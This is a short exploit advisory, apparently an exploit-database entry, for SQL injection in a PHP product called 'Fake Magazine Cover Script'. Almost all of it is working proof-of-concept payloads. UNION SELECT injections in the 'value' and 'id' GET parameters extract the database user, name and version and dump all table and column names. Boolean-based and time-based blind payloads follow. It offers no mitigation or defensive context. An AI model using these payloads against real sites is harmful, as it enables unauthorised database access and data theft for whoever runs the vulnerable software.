Fake Magazine Cover Script – SQL Injection
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/rate.php?value=[SQL] -1047+/*!00005UniOn*/+/*!00005SelEct*/+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),2--+- http://localhost/[PATH]/content.php?id=[SQL] -237+/*!00005UNION*/+/*!00005SELECT*/+1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13--+- Parameter: value (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: value=1047 AND 6465=6465 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: value=1047 AND SLEEP(5) Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=237 AND 1343=1343 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=237 AND SLEEP(5)